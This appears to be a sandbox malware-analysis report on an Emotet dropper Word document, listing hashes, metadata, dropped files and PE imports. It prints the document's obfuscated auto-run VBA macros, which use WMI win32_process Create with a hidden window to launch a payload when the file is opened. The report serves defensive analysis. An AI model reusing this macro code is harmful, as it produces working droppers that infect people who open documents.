0c23d02d...ea44 | Files
Try VMRay Analyzer
VTI SCORE: 100/100
Dynamic Analysis Report
Classification:
Dropper
Downloader
Spyware
Threat Names:
Emotet
Generic.EmotetU.C1B1709D
Gen:Variant.Razy.494038
...

Remarks

(0x0200000C): The maximum memory dump size was exceeded. Some dumps may be missing in the report.

Filters:
Filename Category Type Severity Actions
C:\Users\aETAdzjz\Desktop\sample.doc Sample File Word Document
Malicious
»
Mime Type application/msword
File Size 296.43 KB
MD5 2a14b3778299e0f147f8d6e93ad1fa4f Copy to Clipboard
SHA1 2b4ab607f4cc2ba39d223ad27203d7bac4a3c4c2 Copy to Clipboard
SHA256 0c23d02d9bdfeff59ce2b2af56e357be4dcef9a08d157a380599d305dcb9ea44 Copy to Clipboard
SSDeep 6144:90Rum7mdLRp1bbSBIR/EHGtCMXgTo8qoFt/etg+NXdxypi8wgHOHK20ujA6gNuzp:90E3dxtR/iU9mvUPrx98wgHOHK20ujA0 Copy to Clipboard
ImpHash None Copy to Clipboard
Parser Error Remark Static engine was unable to completely parse the analyzed file
Office Information
»
Title Eaque.
Creator Romain Lambert
Revision 1
Create Time 2020-01-21 17:53:00+00:00
Modify Time 2020-01-21 17:53:00+00:00
Document Information
»
Codepage ANSI_Latin1
Application Microsoft Office Word
App Version 16.0
Template Normal.dotm
Document Security NONE
Page Count 1
Line Count 1
Paragraph Count 1
Word Count 4
Character Count 28
Chars With Spaces 31
scale_crop False
shared_doc False
Controls (2)
»
CLSID Control Name Associated Vulnerability
{00020906-0000-0000-C000-000000000046} Word97 -
{6E182020-F460-11CE-9BCD-00AA00608E01} FormsFrame -
VBA Macros (2)
»
Macro #1: Halpaohsi
»
Attribute VB_Name = "Halpaohsi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Phffmgfhyakn
End Sub
Macro #2: Tslcncqezxxw
»
Attribute VB_Name = "Tslcncqezxxw"
Function Cxwtfasbi()
   For Ummppcjymvmfw = rgfasd To Mbeqdzhakotiy
         ewr = dsf - CVar(er * 23)
                     Ozuiphpxdsni = CSng(Qrwnlqfsd)
            Nmbbvukqshnko = CLng(Wdbxpruutww)
            Next
     If er > Rowwwmbvov Then
         gggs = Sin(3)
                     Crtydgixxtbqg = Srhezzyzd
            Obosihuynzb = CByte(8 - CSng(3))
End If
      If sdf > Qoxoxmfqohi Then
         wer3 = Sin(1)
                     Rizesqnmr = Fluwhufrur
            Bjbqfaaufo = CByte(234 - CSng(3))
End If
For Lzjhkjdzioj = rgfasd To Jitbrjpcxxuq
         ewr = dsf - CDbl(er * 23)
                     Mrldqjdkh = CSng(Glnpbnapywrgt)
            Mnoboqlbr = CLng(Ksdpybickxbnw)
            Next
Psyxizhgdtcsr = I + ChrW(wdKeyP)
   For Haeiuvmwpueta = rgfasd To Arbtkeldv
         ewr = dsf - CVar(er * 23)
                     Hiccshwszmljt = CSng(Fujgvdcvsutfz)
            Xjywoetnbxxhl = CLng(Ihllyquooue)
            Next
     If er > Izbxxepbkx Then
         gggs = Sin(3)
                     Lhhiywradmlu = Fcukckrjebwzk
            Nxjrqnimf = CByte(8 - CSng(3))
End If
      If sdf > Mmhwnhjbymhav Then
         wer3 = Sin(1)
                     Cdfmzmku = Cdwiwqouexe
            Ooqiitfwo = CByte(234 - CSng(3))
End If
For Kfgsqlcrrhl = rgfasd To Scwsgrmzau
         ewr = dsf - CDbl(er * 23)
                     Idbbksnwjyqjw = CSng(Unkbckdpgwnq)
            Njlouhiaphoy = CLng(Ulnwcysm)
            Next
Xgnhnban = Psyxizhgdtcsr + Xvzwvdjxjbaph.Dmhwktuoqw + Xvzwvdjxjbaph.Mspgvegbrck
   For Rvikdnfkowx = rgfasd To Pexrfnlrx
         ewr = dsf - CVar(er * 23)
                     Zkbugpnmcl = CSng(Fgwgodgxxm)
            Oceredxtuxksl = CLng(Yjkztktr)
            Next
     If er > Gwoqdombd Then
         gggs = Sin(3)
                     Lvhzokpi = Vdzinmnqm
            Tjyhjdriyr = CByte(8 - CSng(3))
End If
      If sdf > Znocaeaej Then
         wer3 = Sin(1)
                     Lsoiqbzl = Trmjrfhyzx
            Zauzknlmqbe = CByte(234 - CSng(3))
End If
For Ouubhzfqsg = rgfasd To Siztfjrq
         ewr = dsf - CDbl(er * 23)
                     Onqrmzevrnhx = CSng(Mxsyhxgtzy)
            Mtksnonv = CLng(Kpnflxoit)
            Next
sss = Xvzwvdjxjbaph.Srghtmcdobug.GroupName
Hsiszpxdwvzre = Split(Xgnhnban + CStr(Trim(sss)), "=mmuusns=")
   For Nfkmwqidjzol = rgfasd To Myxgwvdlvca
         ewr = dsf - CVar(er * 23)
                     Cmpcqnaabwc = CSng(Okukbnajspyqw)
            Ckimrzgruwx = CLng(Olcvaxgtq)
            Next
     If er > Meijwqlu Then
         gggs = Sin(3)
                     Xroqozisan = Tuhndpzlxly
            Nqwudkccxqtne = CByte(8 - CSng(3))
End If
      If sdf > Xaqxvylncjnwu Then
         wer3 = Sin(1)
                     Msgrajmywc = Veozzccnwv
            Bcdulqoisl = CByte(234 - CSng(3))
End If
For Hmmolctu = rgfasd To Pjnjnuswoq
         ewr = dsf - CDbl(er * 23)
                     Qyfsngotujzn = CSng(Qnbubgtpmu)
            Ctpvwnjn = CLng(Itpngzrfjar)
            Next
Cxwtfasbi = Join(Hsiszpxdwvzre, "")
   For Hacdoyen = rgfasd To Wpojmowng
         ewr = dsf - CVar(er * 23)
                     Vbahfauijsvq = CSng(Mlxwizrpyfmr)
            Vrrldgmybw = CLng(Kfcpazorzcyqx)
            Next
     If er > Gcvuopin Then
         gggs = Sin(3)
                     Kmsfnkbn = Mmjenctmttb
            Cgwgbuicsk = CByte(8 - CSng(3))
End If
      If sdf > Mvllswcmdqt Then
         wer3 = Sin(1)
                     Hlvvtyzwbqz = Ztcmucuo
            Haaxybhmm = CByte(234 - CSng(3))
End If
For Uimgymptkfm = rgfasd To Wijrwrzcgeo
         ewr = dsf - CDbl(er * 23)
                     Bavudnppflpg = CSng(Evpbvgmaqsp)
            Cmodykflpyqb = CLng(Yrxukzavh)
            Next
End Function
Function Phffmgfhyakn()
dv = "in=mmuusns==mmuusns==mmuusns=mgm=mmuusns==mmuusns==mmuusns=t" + ChrW(wdKeyS) + ":=mmuusns==mmuusns=win=mmuusns==mmuusns=32=mmuusns==mmuusns=_" + Xvzwvdjxjbaph.Rghedtey + "r=mmuusns==mmuusns=oc=mmuusns==mmuusns==mmuusns=ess=mmuusns==mmuusns="
   For Irhevqhybvg = rgfasd To Hhsopmqko
         ewr = dsf - CVar(er * 23)
                     Gqorawher = CSng(Akmkjqycb)
            Ftjcvmavdu = CLng(Xebpxfoc)
            Next
     If er > Bhhbfdzmlwuvk Then
         gggs = Sin(3)
                     Ybudwflhk = Hbaxnkhhr
            Ugxvriwfbtgh = CByte(8 - CSng(3))
End If
      If sdf > Tyisqaxl Then
         wer3 = Sin(1)
                     Ylojknddfchng = Dkenlatatum
            Bbxigbxfunv = CByte(234 - CSng(3))
End If
For Dbwwfrhenpt = rgfasd To Uelupxopcdf
         ewr = dsf - CDbl(er * 23)
                     Fdiixjzvx = CSng(Xourjome)
            Gsuayxaabxry = CLng(Eweskxtxmh)
            Next
fd = "=mmuusns="
   For Ioqelyua = rgfasd To Iltypfpqhc
         ewr = dsf - CVar(er * 23)
                     Czlgcqoovlkq = CSng(Maqsbzzgnbm)
            Zzkomcpm = CLng(Ewemunwacryt)
            Next
     If er > Oaxtvmkuhmppk Then
         gggs = Sin(3)
                     Nrdvhlwxnetra = Ffkkzlfw
            Ikpsweczc = CByte(8 - CSng(3))
End If
      If sdf > Uxhosdkpcvkkd Then
         wer3 = Sin(1)
                     Fzxniunrya = Qzrryvdkh
            Hhvhojyallnzc = CByte(234 - CSng(3))
End If
For Gfhginlxtpl = rgfasd To Pawccdpfnn
         ewr = dsf - CDbl(er * 23)
                     Zauudzoqj = CSng(Cbujwjbrdgnll)
            Wzlisriyim = CLng(Qpwmbabu)
            Next
Jmtxjlisob = Split("=mmuusns==mmuusns==mmuusns==mmuusns==mmuusns=w" + dv + T, fd)
   For Fqyzinoym = rgfasd To Pultigwfb
         ewr = dsf - CVar(er * 23)
                     Uvilpzyvlnj = CSng(Eynhnfqvqvjr)
            Afskklpwdqwx = CLng(Qztgcspk)
            Next
     If er > Svfuezzutfy Then
         gggs = Sin(3)
                     Dygdivwkpqqf = Cpdeqnes
            Vsdrcejca = CByte(8 - CSng(3))
End If
      If sdf > Hvogovdcfoo Then
         wer3 = Sin(1)
                     Wfpbicnlkaiqr = Kgoeilvtpx
            Apjqgegvwpiu = CByte(234 - CSng(3))
End If
For Fxugqwpusyak = rgfasd To Bladgknwak
         ewr = dsf - CDbl(er * 23)
                     Lklvytgpgy = CSng(Hecfwlqwa)
            Lpfnogiwkfel = CLng(Wagepfcmrv)
            Next
Mbxypfjaagzo = Join(Jmtxjlisob, "")
   For Fgpbircvm = rgfasd To Fmsrpghx
         ewr = dsf - CVar(er * 23)
                     Vuhylhkc = CSng(Zbhvwkzbssq)
            Qtqshshb = CLng(Eklhdwjs)
            Next
     If er > Tddfxufhgfm Then
         gggs = Sin(3)
                     Qrfvpckqotyck = Weiaxikm
            Umnavartnu = CByte(8 - CSng(3))
End If
      If sdf > Atpizekfcmjck Then
         wer3 = Sin(1)
                     Lnogfpkvqwqtt = Xqmydplpjf
            Iidlptdfgz = CByte(234 - CSng(3))
End If
For Jqyzmjlqyt = rgfasd To Pmxhzxebdebm
         ewr = dsf - CDbl(er * 23)
                     Azpacydcpn = CSng(Datllptkvc)
            Fjulgeolmbila = CLng(Qpmxkqnteis)
            Next
Set Nbjlfulfh = GetObject(Mbxypfjaagzo)
   For Dlaqwtsa = rgfasd To Xedfhncc
         ewr = dsf - CVar(er * 23)
                     Nszuzkhonwyb = CSng(Esmykmztsyfik)
            Jlmjomkmgrm = CLng(Mzgwzdbp)
            Next
     If er > Susuaaoq Then
         gggs = Sin(3)
                     Ydklspmt = Hxbwgssjj
            Aihuowsk = CByte(8 - CSng(3))
End If
      If sdf > Bmhejovdjrhj Then
         wer3 = Sin(1)
                     Utwoiiehucyvd = Tujvnglt
            Dxgzpurnlzvzd = CByte(234 - CSng(3))
End If
For Otsfgnle = rgfasd To Wxohpjzfrel
         ewr = dsf - CDbl(er * 23)
                     Ehgirqiuq = CSng(Zmtokjrsgjsw)
            Vqwtmxrpl = CLng(Afunrvgqvicpk)
            Next
Epuodgcp = Xvzwvdjxjbaph.Qgnmwpcsosft.Tag
Nwlspbgev = Mbxypfjaagzo + ChrW(wdKeyS) + Xvzwvdjxjbaph.Hmqtdcvzqfs.Tag + Epuodgcp
   For Jznxrrsnztkw = rgfasd To Icwwpescgsond
         ewr = dsf - CVar(er * 23)
                     Erxqtqfhjlgio = CSng(Rongvkdbb)
            Hsvjeocpvcmgh = CLng(Unliveda)
            Next
     If er > Zxtnbpwktjmmz Then
         gggs = Sin(3)
                     Fyddfifxsppq = Vdrvjeqicu
            Voyqineppgz = CByte(8 - CSng(3))
End If
      If sdf > Rtabxlzczygu Then
         wer3 = Sin(1)
                     Ccxvjromryb = Mdupeuar
            Geinnwqsvrw = CByte(234 - CSng(3))
End If
For Skqfgfcbaqk = rgfasd To Fibaqzrlqqada
         ewr = dsf - CDbl(er * 23)
                     Ffpekqbe = CSng(Tlhogoyaorh)
            Bxjbctpbgpbw = CLng(Fciddnlx)
            Next
Fhmdqkvcai = Nwlspbgev + Xvzwvdjxjbaph.Rghedtey
   For Lazvwlklomuqv = rgfasd To Bfspfsvlezbl
         ewr = dsf - CVar(er * 23)
                     Djsngryqnjtae = CSng(Oiegnsfwcze)
            Uwuaonkcccp = CLng(Lsjvfoyypqxe)
            Next
     If er > Ynpocckwr Then
         gggs = Sin(3)
                     Mrmkmfpwshnm = Pqqefxvfhmpm
            Ilpbuctxmnc = CByte(8 - CSng(3))
End If
      If sdf > Hqxkajuml Then
         wer3 = Sin(1)
                     Lrxgjauarbo = Msdasecbtpnp
            Pcubwrxp = CByte(234 - CSng(3))
End If
For Moltcugti = rgfasd To Ifttgrprbkqyy
         ewr = dsf - CDbl(er * 23)
                     Xarpuxozndsjz = CSng(Ugfdhwahqz)
            Buwpnoewfbtka = CLng(Gqniqrspk)
            Next
Set Phffmgfhyakn = GetObject(Fhmdqkvcai)
   For Pudwquipw = rgfasd To Twkbeeebb
         ewr = dsf - CVar(er * 23)
                     Ujelxdldnb = CSng(Mdvwekrpwmxwg)
            Gqygnvgaure = CLng(Dsnfyyxxi)
            Next
     If er > Rjumimhfpmemp Then
         gggs = Sin(3)
                     Dfdbfannl = Ryhjtxiypdaus
            Ygrzfxjqvr = CByte(8 - CSng(3))
End If
      If sdf > Czdwihiuj Then
         wer3 = Sin(1)
                     Theqgdcll = Bgvmybihmszq
            Lhsmjmabayrbh = CByte(234 - CSng(3))
End If
For Sgiohxwawj = rgfasd To Bkntqyquwk
         ewr = dsf - CDbl(er * 23)
                     Guagwuxt = CSng(Umrcycpgwdca)
            Mfbdrjqhhfh = CLng(Qdblnhgqbcozo)
            Next
Phffmgfhyakn. _
showwindow = False
   For Egpwnmsp = rgfasd To Nziwmlcoxazlv
         ewr = dsf - CVar(er * 23)
                     Dlzspewhcf = CSng(Nucpbesqtki)
            Qnsmbtkrlk = CLng(Xftrsgrexptv)
            Next
     If er > Hchrsdrjzrdva Then
         gggs = Sin(3)
                     Xbkcwdyzzaerd = Txacliku
            Angcnxffhzojt = CByte(8 - CSng(3))
End If
      If sdf > Jdhqnloxyxfu Then
         wer3 = Sin(1)
                     Pmgsewqrwmdzl = Mjemhcecdd
            Qiehdggsmh = CByte(234 - CSng(3))
End If
For Rergvnoatkm = rgfasd To Hrwkkdpt
         ewr = dsf - CDbl(er * 23)
                     Jreasfdzetqvc = CSng(Hqplsfvqgvpji)
            Bvhehprnv = CLng(Livkmolmdma)
            Next
Do While Nbjlfulfh. _
Create(er & Cxwtfasbi, Ttfwoikclybkw, Phffmgfhyakn, Anrwyrkpnf)
Loop
   For Prlhuwaksj = rgfasd To Rzvqamgzdxk
         ewr = dsf - CVar(er * 23)
                     Eyhuwmtjqih = CSng(Vlydskeg)
            Lodfalishvsq = CLng(Pvxzearoearu)
            Next
     If er > Fzmjugwf Then
         gggs = Sin(3)
                     Sxiqzqifo = Wmfbjbwkdog
            Nhiivrvkc = CByte(8 - CSng(3))
End If
      If sdf > Gsbonslgu Then
         wer3 = Sin(1)
                     Nhhlezvpr = Zcsizjxkcuv
            Qaiwkczpvfub = CByte(234 - CSng(3))
End If
For Mvomzustyw = rgfasd To Bjjjnsimuerz
         ewr = dsf - CDbl(er * 23)
                     Myexxgyzkpo = CSng(Ecxcmqraqflr)
            Ppiephkhuoby = CLng(Cyuvewejxcfi)
            Next
End Function


Document Content
»
c:\users\aetadzjz\appdata\local\temp\~dfc9208b8177d1ee10.tmp Dropped File Unknown
Whitelisted
»
Mime Type application/CDFV2
File Size 1.50 KB
MD5 72f5c05b7ea8dd6059bf59f50b22df33 Copy to Clipboard
SHA1 d5af52e129e15e3a34772806f6c5fbf132e7408e Copy to Clipboard
SHA256 1dc0c8d7304c177ad0e74d3d2f1002eb773f4b180685a7df6bbe75ccc24b0164 Copy to Clipboard
SSDeep 3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X Copy to Clipboard
ImpHash None Copy to Clipboard
File Reputation Information
»
Severity
Whitelisted
First Seen 2013-03-17 16:11 (UTC+1)
Last Seen 2019-02-22 02:24 (UTC+1)
c:\users\aetadzjz\appdata\local\temp\~df7fae8046229cf905.tmp Dropped File Stream
Whitelisted
»
Also Known As c:\users\aetadzjz\appdata\local\temp\~df1fc9d1914fcb9da0.tmp (Dropped File)
Mime Type application/octet-stream
File Size 512 Bytes
MD5 bf619eac0cdf3f68d496ea9344137e8b Copy to Clipboard
SHA1 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 Copy to Clipboard
SHA256 076a27c79e5ace2a3d47f9dd2e83e4ff6ea8872b3c2218f66c92b89b55f36560 Copy to Clipboard
SSDeep 3:: Copy to Clipboard
ImpHash None Copy to Clipboard
File Reputation Information
»
Severity
Whitelisted
First Seen 2011-07-06 01:20 (UTC+2)
Last Seen 2019-12-06 01:08 (UTC+1)
C:\Users\aETAdzjz\AppData\Local\sendduck\sendduckb.exe Dropped File Binary
Whitelisted
»
Also Known As C:\Users\aETAdzjz\AppData\Local\sendduck\sendducka.exe (Dropped File)
Mime Type application/vnd.microsoft.portable-executable
File Size 77.50 KB
MD5 3290d6946b5e30e70414990574883ddb Copy to Clipboard
SHA1 be0144e3235ffde0787e9f1cd34c828ec87d8e19 Copy to Clipboard
SHA256 0e9294e1991572256b3cda6b031db9f39ca601385515ee59f1f601725b889663 Copy to Clipboard
SSDeep 1536:4Dfm8/DhQ/65oIFM8oWcwnLUq0Sjw0hkFNaH3:G7Lm/6ohWc4oq0u7kn Copy to Clipboard
ImpHash 1f6cbfb8aa32847b01fd3e7e70d29d61 Copy to Clipboard
File Reputation Information
»
Severity
Whitelisted
First Seen 2012-10-01 02:48 (UTC+2)
Last Seen 2019-12-02 13:40 (UTC+1)
PE Information
»
Image Base 0x100000000
Entry Point 0x10000bdfc
Size Of Code 0xf800
Size Of Initialized Data 0x4400
File Type FileType.executable
Subsystem Subsystem.windows_gui
Machine Type MachineType.amd64
Compile Timestamp 2009-07-14 00:08:46+00:00
Version Information (8)
»
CompanyName Microsoft Corporation
FileDescription Application Layer Gateway Service
FileVersion 6.1.7600.16385 (win7_rtm.090713-1255)
InternalName ALG.exe
LegalCopyright © Microsoft Corporation. All rights reserved.
OriginalFilename ALG.exe
ProductName Microsoft® Windows® Operating System
ProductVersion 6.1.7600.16385
Sections (5)
»
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x100001000 0xf7fe 0xf800 0x400 IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ 5.98
.data 0x100011000 0xe18 0x600 0xfc00 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 2.36
.pdata 0x100012000 0xfa8 0x1000 0x10200 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ 4.58
.rsrc 0x100013000 0x1fc8 0x2000 0x11200 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ 5.5
.reloc 0x100015000 0x28a 0x400 0x13200 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ 2.9
Imports (9)
»
ADVAPI32.dll (9)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
SetServiceStatus 0x0 0x100001000 0xfcf8 0xf0f8 0x2c0
RegisterServiceCtrlHandlerW 0x0 0x100001008 0xfd00 0xf100 0x288
RegNotifyChangeKeyValue 0x0 0x100001010 0xfd08 0xf108 0x25d
RegCloseKey 0x0 0x100001018 0xfd10 0xf110 0x230
RegOpenKeyExW 0x0 0x100001020 0xfd18 0xf118 0x261
StartServiceCtrlDispatcherW 0x0 0x100001028 0xfd20 0xf120 0x2c8
RegQueryValueExW 0x0 0x100001030 0xfd28 0xf128 0x26e
RegEnumKeyExW 0x0 0x100001038 0xfd30 0xf130 0x24f
SystemFunction036 0x0 0x100001040 0xfd38 0xf138 0x2f1
KERNEL32.dll (36)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
CreateEventW 0x0 0x100001088 0xfd80 0xf180 0x85
WaitForMultipleObjects 0x0 0x100001090 0xfd88 0xf188 0x506
Sleep 0x0 0x100001098 0xfd90 0xf190 0x4c0
HeapSetInformation 0x0 0x1000010a0 0xfd98 0xf198 0x2db
WaitForSingleObject 0x0 0x1000010a8 0xfda0 0xf1a0 0x508
SetEvent 0x0 0x1000010b0 0xfda8 0xf1a8 0x467
CreateThread 0x0 0x1000010b8 0xfdb0 0xf1b0 0xb4
CreateTimerQueueTimer 0x0 0x1000010c0 0xfdb8 0xf1b8 0xbc
DeleteTimerQueueTimer 0x0 0x1000010c8 0xfdc0 0xf1c0 0xdb
GetCurrentProcessId 0x0 0x1000010d0 0xfdc8 0xf1c8 0x1c7
DuplicateHandle 0x0 0x1000010d8 0xfdd0 0xf1d0 0xec
GetCurrentProcess 0x0 0x1000010e0 0xfdd8 0xf1d8 0x1c6
RaiseException 0x0 0x1000010e8 0xfde0 0xf1e0 0x3b4
EnterCriticalSection 0x0 0x1000010f0 0xfde8 0xf1e8 0xf2
LeaveCriticalSection 0x0 0x1000010f8 0xfdf0 0xf1f0 0x33b
WriteFile 0x0 0x100001100 0xfdf8 0xf1f8 0x534
ReadFile 0x0 0x100001108 0xfe00 0xf200 0x3c3
BindIoCompletionCallback 0x0 0x100001110 0xfe08 0xf208 0x39
CloseHandle 0x0 0x100001118 0xfe10 0xf210 0x52
GetProcessHeap 0x0 0x100001120 0xfe18 0xf218 0x251
HeapAlloc 0x0 0x100001128 0xfe20 0xf220 0x2d3
UnhandledExceptionFilter 0x0 0x100001130 0xfe28 0xf228 0x4e2
TerminateProcess 0x0 0x100001138 0xfe30 0xf230 0x4ce
GetSystemTimeAsFileTime 0x0 0x100001140 0xfe38 0xf238 0x280
GetCurrentThreadId 0x0 0x100001148 0xfe40 0xf240 0x1cb
GetTickCount 0x0 0x100001150 0xfe48 0xf248 0x29a
QueryPerformanceCounter 0x0 0x100001158 0xfe50 0xf250 0x3a9
GetModuleHandleW 0x0 0x100001160 0xfe58 0xf258 0x21e
SetUnhandledExceptionFilter 0x0 0x100001168 0xfe60 0xf260 0x4b3
GetStartupInfoW 0x0 0x100001170 0xfe68 0xf268 0x26a
InitializeCriticalSection 0x0 0x100001178 0xfe70 0xf270 0x2ea
DeleteCriticalSection 0x0 0x100001180 0xfe78 0xf278 0xd2
DeleteTimerQueueEx 0x0 0x100001188 0xfe80 0xf280 0xda
CreateTimerQueue 0x0 0x100001190 0xfe88 0xf288 0xbb
GetLastError 0x0 0x100001198 0xfe90 0xf290 0x208
HeapFree 0x0 0x1000011a0 0xfe98 0xf298 0x2d7
msvcrt.dll (38)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
_unlock 0x0 0x100001260 0xff58 0xf358 0x330
_lock 0x0 0x100001268 0xff60 0xf360 0x1d5
?terminate@@YAXXZ 0x0 0x100001270 0xff68 0xf368 0x30
memset 0x0 0x100001278 0xff70 0xf370 0x484
_onexit 0x0 0x100001280 0xff78 0xf378 0x27f
??1type_info@@UEAA@XZ 0x0 0x100001288 0xff80 0xf380 0x12
__dllonexit 0x0 0x100001290 0xff88 0xf388 0x6d
__set_app_type 0x0 0x100001298 0xff90 0xf390 0x80
_fmode 0x0 0x1000012a0 0xff98 0xf398 0x118
__setusermatherr 0x0 0x1000012a8 0xffa0 0xf3a0 0x82
_amsg_exit 0x0 0x1000012b0 0xffa8 0xf3a8 0xa0
_initterm 0x0 0x1000012b8 0xffb0 0xf3b0 0x16c
_wcmdln 0x0 0x1000012c0 0xffb8 0xf3b8 0x371
exit 0x0 0x1000012c8 0xffc0 0xf3c0 0x420
_cexit 0x0 0x1000012d0 0xffc8 0xf3c8 0xb3
_exit 0x0 0x1000012d8 0xffd0 0xf3d0 0xff
_XcptFilter 0x0 0x1000012e0 0xffd8 0xf3d8 0x52
__C_specific_handler 0x0 0x1000012e8 0xffe0 0xf3e0 0x53
__wgetmainargs 0x0 0x1000012f0 0xffe8 0xf3e8 0x8f
__CxxFrameHandler3 0x0 0x1000012f8 0xfff0 0xf3f0 0x57
_callnewh 0x0 0x100001300 0xfff8 0xf3f8 0xb1
malloc 0x0 0x100001308 0x10000 0xf400 0x474
_CxxThrowException 0x0 0x100001310 0x10008 0xf408 0x4c
??0exception@@QEAA@AEBQEBDH@Z 0x0 0x100001318 0x10010 0xf410 0xb
memmove 0x0 0x100001320 0x10018 0xf418 0x482
realloc 0x0 0x100001328 0x10020 0xf420 0x497
??0exception@@QEAA@XZ 0x0 0x100001330 0x10028 0xf428 0xd
memmove_s 0x0 0x100001338 0x10030 0xf430 0x483
memcpy_s 0x0 0x100001340 0x10038 0xf438 0x481
_wcsicmp 0x0 0x100001348 0x10040 0xf440 0x379
free 0x0 0x100001350 0x10048 0xf448 0x43a
?what@exception@@UEBAPEBDXZ 0x0 0x100001358 0x10050 0xf450 0x32
??0exception@@QEAA@AEBV0@@Z 0x0 0x100001360 0x10058 0xf458 0xc
isdigit 0x0 0x100001368 0x10060 0xf460 0x454
??1exception@@UEAA@XZ 0x0 0x100001370 0x10068 0xf468 0x11
??0exception@@QEAA@AEBQEBD@Z 0x0 0x100001378 0x10070 0xf470 0xa
_commode 0x0 0x100001380 0x10078 0xf478 0xc4
memcpy 0x0 0x100001388 0x10080 0xf480 0x480
ATL.DLL (6)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
(by ordinal) 0x11 0x100001050 0xfd48 0xf148 -
(by ordinal) 0x10 0x100001058 0xfd50 0xf150 -
(by ordinal) 0x20 0x100001060 0xfd58 0xf158 -
(by ordinal) 0x17 0x100001068 0xfd60 0xf160 -
(by ordinal) 0x14 0x100001070 0xfd68 0xf168 -
(by ordinal) 0x15 0x100001078 0xfd70 0xf170 -
WS2_32.dll (15)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
htons 0x9 0x1000011c8 0xfec0 0xf2c0 -
getpeername 0x5 0x1000011d0 0xfec8 0xf2c8 -
getsockname 0x6 0x1000011d8 0xfed0 0xf2d0 -
bind 0x2 0x1000011e0 0xfed8 0xf2d8 -
WSASocketW 0x0 0x1000011e8 0xfee0 0xf2e0 0x53
socket 0x17 0x1000011f0 0xfee8 0xf2e8 -
closesocket 0x3 0x1000011f8 0xfef0 0xf2f0 -
ntohs 0xf 0x100001200 0xfef8 0xf2f8 -
WSAIoctl 0x0 0x100001208 0xff00 0xf300 0x36
listen 0xd 0x100001210 0xff08 0xf308 -
htonl 0x8 0x100001218 0xff10 0xf310 -
setsockopt 0x15 0x100001220 0xff18 0xf318 -
WSAStartup 0x73 0x100001228 0xff20 0xf320 -
WSACleanup 0x74 0x100001230 0xff28 0xf328 -
WSAGetLastError 0x6f 0x100001238 0xff30 0xf330 -
ole32.dll (6)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
CoTaskMemFree 0x0 0x1000013b8 0x100b0 0xf4b0 0x6c
CoTaskMemAlloc 0x0 0x1000013c0 0x100b8 0xf4b8 0x6b
CoUninitialize 0x0 0x1000013c8 0x100c0 0xf4c0 0x70
CoInitializeEx 0x0 0x1000013d0 0x100c8 0xf4c8 0x43
CLSIDFromString 0x0 0x1000013d8 0x100d0 0xf4d0 0xc
CoCreateInstance 0x0 0x1000013e0 0x100d8 0xf4d8 0x14
OLEAUT32.dll (2)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
SysAllocString 0x2 0x1000011b0 0xfea8 0xf2a8 -
SysFreeString 0x6 0x1000011b8 0xfeb0 0xf2b0 -
ntdll.dll (3)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
RtlCaptureContext 0x0 0x100001398 0x10090 0xf490 0x27b
RtlLookupFunctionEntry 0x0 0x1000013a0 0x10098 0xf498 0x401
RtlVirtualUnwind 0x0 0x1000013a8 0x100a0 0xf4a0 0x4f0
WSOCK32.dll (2)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
ord1141 0x475 0x100001248 0xff40 0xf340 -
ord1142 0x476 0x100001250 0xff48 0xf348 -
Memory Dumps (9)
»
Name Process ID Start VA End VA Dump Reason PE Rebuild Bitness Entry Point AV YARA Actions
buffer 22 0x140000000 0x140022FFF First Execution True 64-bit 0x140006B54 True True
sendduckb.exe 22 0xFF7E0000 0xFF7F5FFF Relevant Image True 64-bit - False False
buffer 22 0x140000000 0x140022FFF Content Changed True 64-bit 0x140007784 True True
buffer 22 0x140000000 0x140022FFF Content Changed True 64-bit 0x14000A9F8 True True
buffer 22 0x140000000 0x140022FFF Content Changed True 64-bit 0x14000B9B4 True True
buffer 22 0x140000000 0x140022FFF Content Changed True 64-bit 0x14000C5E0 True True
buffer 22 0x140000000 0x140022FFF Content Changed True 64-bit 0x14000D88C True True
buffer 22 0x140000000 0x140022FFF Content Changed True 64-bit 0x1400046C0 True True
buffer 22 0x140000000 0x140022FFF Content Changed True 64-bit 0x140005600 True True
c:\users\aetadzjz\appdata\local\temp\~df5c3c42457c3f014b.tmp Dropped File Unknown
Unknown
»
Mime Type application/CDFV2
File Size 20.00 KB
MD5 2ada0850f5ce89a641f4207ebf5aeb41 Copy to Clipboard
SHA1 640e2fcae59fcc5188df28c24df5d883e1103a30 Copy to Clipboard
SHA256 69d486c23baf74048d0e18bd57b6e7bb331cedf18de001d899f32cdbc6bee4f6 Copy to Clipboard
SSDeep 96:wQB+wm9fmffwMGjIBdaB1uM1dm5Gf1uGNLZJZAAsY/k1BCV5oC/C2Ol48YXuhESt:wQM5wnAHK+i4iAfQjOq3p Copy to Clipboard
ImpHash None Copy to Clipboard
c:\users\aetadzjz\appdata\local\temp\~df207c8c2a9159a39e.tmp Dropped File Unknown
Unknown
»
Mime Type application/CDFV2
File Size 20.00 KB
MD5 0442563f0615a2a47129af39e9c57547 Copy to Clipboard
SHA1 70e70adbc9e6278a1216b86ec7ed20766e904608 Copy to Clipboard
